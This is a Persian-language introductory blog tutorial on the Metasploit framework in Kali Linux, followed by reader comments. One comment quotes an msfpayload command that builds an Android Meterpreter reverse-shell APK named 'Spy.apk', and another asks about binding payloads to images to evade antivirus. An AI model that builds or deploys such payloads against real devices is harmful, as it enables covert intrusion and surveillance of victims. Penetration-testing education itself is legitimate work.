آشنایی با مفهوم متا اسپلویت (Metasploit) در دنیای امنیت و کالی لینوکس یکی از بخش های یادگیری این مسیر است که در این مطلب با مفهوم متا اسپلویت آشنا خواهیم شد. به زبان بسیار ساده Metasploit یک فریمورک ( Framework ) نوشته شده به زبان Ruby است که در حوزه تست نفوذ و هک فعالیت می کند و امکان نوشتن ، تست و اجرا کردن انواع Exploit ها را به ما می دهد.
متااسپلویت دارای ابزارهایی است که به شما امکان تست کردن آسیب پذیری ها ، Enumerate کردن اطلاعات شبکه ، اجرای حملات هکری و حتی تشخیص برخی حملات را می دهد. برای جامعه انجام دهندگان تست های امنیت، Metasploit و Metasploit Pro یکی از جذاب ترین ابزارهایی است که تاکنون به آن برخورده اند. Metasploit بشما یک framework و یا یک زمینه کامل و بی نقص برای تست های امنیت میدهد.
چهارچوب Metasploit یک پلت فرم جامع برای انجام تست های آسیب پذیری و نفوذ است. این پلت فرم با هزاران نقطه قابل نفوذ، صدها payload و مبدل های مختلفی لود میشود. در اینجا و قسمت های بعد استفاده های اساسی و پایه ای را در Metasploit پوشش خواهیم داد و در ادامه مباحث خواهیم آموخت که چگونه از Metasploit به عنوان هدفی تستی استفاده لازم را ببریم. اگر شما با کارکردهای metasploit آشنا هستید، میتوانید با خیال راحت این بخش را رد کنید و یا از آن به عنوان مروری بر دانسته های خود استفاده کنید.
به روز رسانی Metasploit
معمولا برای بروزرسانی Metasploit، باید فرمان "mfsupdate" را اجرا کنید اما با دانستن این نکته که آپدیت های Metasploit با آپدیت های هفتگی کالی نیز همگام سازی میشوند، ممکن است رفتار شما در قبال بروزرسانی جداگانه Metasploit کمی تغیر کند.
دسترسی به Metasploit
شما میتوانید از طرق زیر به Matasploit دسترسی داشته باشید:
- Kali Linux/Top Ten Security Tools/Metasploit framework
- Kali linux/Exploitation Tools/Metasploit
- وارد کردن فرمان "msfconsole" در ترمینال
هنگامی که Metasploit لود شود، شما یا صفحه نمایش نشان داده در شکل زیر روبرو خواهید شد:
اگر تا بحال با این پلت فرم روبرو نشده باشید، ممکن است کمی گیج کننده به نظر برسد اما هنگامی که متوجه شوید که چگونه کار میکند، میتوانید با آن کارهای جالبی انجام دهید.اساسا، استفاده از Metasploit برای حمله به یک سیستم معمولا شامل موارد زیر میشود:
- انتخاب یک اکسپلویت
- تنظیم آپشن ها و گزینه های اختیاری اکسپلویت
- انتخاب یک payload
- تنظیم آپشن ها و گزینه های اختیاری Payload
- اجرا کردن اکسپلویت
- برقررای ارتباط با سیستم مورد نظر (سیستم ریموت)
- اجرای فرآیند سوء استفاده از سیستم مورد نظر
شکل زیر مثالی از این فرایند را نشان خواهد داد، اما نگران نباشید؛ فرآیند گفته شده را در ادامه بصورت جامع برای شما توضیح خواهیم داد:
بسته به نوع اکسپلویت و استفاده ای که میخواهیم از سیستم هدف ببریم؛ زمانی فرآیند تکمیل میشود که توسط Remote shell به سیستم هدف و یا Meterpreter shell بصورت عادی اکسپلویت را پایان دهیم. Meterpreter ابزاریست که در Metasploit تعبیه شده است.یک remote shell اساسا کانکشن ترمینال از راه دور و یا یک نسخه متنی از remote desktop برای کاربران ویندوز است. Remote shell بما این امکان را میدهد تا دستورات را از طریق کیبرد منتقل کنیم.
اما meterpreter shell مجموعه ای از برنامه ها و عناصر جالب را بما پیشنهاد میدهد که بواسطه آن ها میتوانیم درباره سیستم هدف اطلاعات جمع اوری کنیم، کنترل دیوایس های آن مانند وبکم و یا میکروفن را بدست بگیریم، ویا برای دسترسی های بعدی تحت شبکه جای پای خود را محکم کنیم.در بیشتر حالات بسته به این که چه کاری میخواهیم انجام دهیم، یک Meterpreter shell امکانات بیشتری را به نسبت یک regular shell در اختیار قرار میدهد. اگر میخواهید بصورت حرفه ای و فوق تخصصی یادگیری متاسپلویت را انجام دهید به لینک های زیر مراجعه کنید :
- برترین دوره آموزش متااسپلویت (Metasploit) | دوره SANS 580 از مهندس محمدی
- دوره آموزش متااسپلویت | MetaSploit از مهندس تنگسیری
سلام میخواستم بدونم که چگونه یک پیلود برای ویندوز فون بسازم؟
با سلام خدمت دوستان جناب مهندس امجدی میخواستم بدونم تو این دستور :>
msfpayload androidmeterpreterreverse_tcp LHOST=192.168.1.21 LPORT=443 R > Spy.apk
بجای ای پی هاست که یک ای پی داخلی وارد شده من بخوام ای پی ولید وارد کنم شرایط فرق میکنه و با چه پورتی کار کنم بهتره ؟
سلام خسته نباشید
ببخشید من یک سوال داشتم در رابطه با بایند کردن پایلود رو عکس و بیشتر کردن بایپس ها جهت دور زدن انتی ویروس میخواسم بدونم با کالی2 چجوری اینکار انجام بدم؟
سلام من می خواستم واسه کالی vpn درست کنم ولی هرکاری کردم نشد ، حتی گزینه OpenVpn هم باز شد ولی گزینه pptpرو نتونستم باز کنم ، چون کلا اگه بخوایم از طریق دانشگاه به اینترنت وصل شیم باید اول به خود دانشگاه بعد با vpn به اینترنت وصل شیم ، میشه کاری کرد ؟
قطعا کالی 2 از نظر امکانات و ورژن نرم افزارها وضعیت بهتری رو به نسبت ورژن 1 داره. در مورد پیدا نکردن نرم افزارها هم باید بگم که با رفتن به انتهای منوی اپلیکیشن، حق search بشما داده میشه.. احیانا اگه نرم افزاری رو پیدا نکردید، میتونید اونجا جستجو کنید.
باسلام و عرض خسته نباشید به خدمت استاد امجدی
استاد امجدی بنده نصب کردم کالی لینوکس 2 رو ولی امکاناتش خیلی کمه از کالی 1 ایا بنده نوحوه استفاده از کالی 2 رو بلد نیستم؟؟؟ یا باید افضونه هایه دیگه ای نصب کنم؟؟؟ اگر زحمت نباشد من در اینترنت دنبال ورژن 1 گشتم ولی پیدا نکردم لینک ورژن 1 کالی رو برایه استفاده دوستان قرار بدین
باتشکر از شما
این دستورات بر روی پلت فرم متااسپلویت قابل فهم و اجرا هستند. اینکه پلت فرم متااسپلویت بر روی ابونتو قابل اجرا هست یا نه، اطلاعاتی ندارم فقط میدونم که بطور پیش فرض بر روی ابونتو وجود نداره
سلام.
دوست عزیز میتونم تمام این کد ها رو تو اوبونتو اجرا کنم؟؟؟؟؟؟
اصلا اوبونتو برای اینکارا بدرد میخوره؟؟
اگه میشه جوابم رو به ایمیلم بفرستید
دوست عزیز این برنامه مستقلا اجرا نمیشه و باید از طریق صفحه command prompt به آدرس نصب برنامه بری و بعد از طریق همین محیط برنامه رو اجرا و دستورات لازم رو اجرا کنی.
*با عرض سلام و خسته نباشید.
من این برنامه رو نصب کردم در موقع نصب هم انتی ویروس و هم فایروال رو غیرفعال کردم
اما وقتی روی برنامه کلیک میکنم باز میشه و فورا برنامه خودش بسته میشه(برنامه از صفحه دسکتاپ میپره)
روی ویندوز 7و8 امتحان کردم هردو همین مشکلو داشتن.
خواهشا اگ امکانش هست راهنماییم کنین.
مرسی*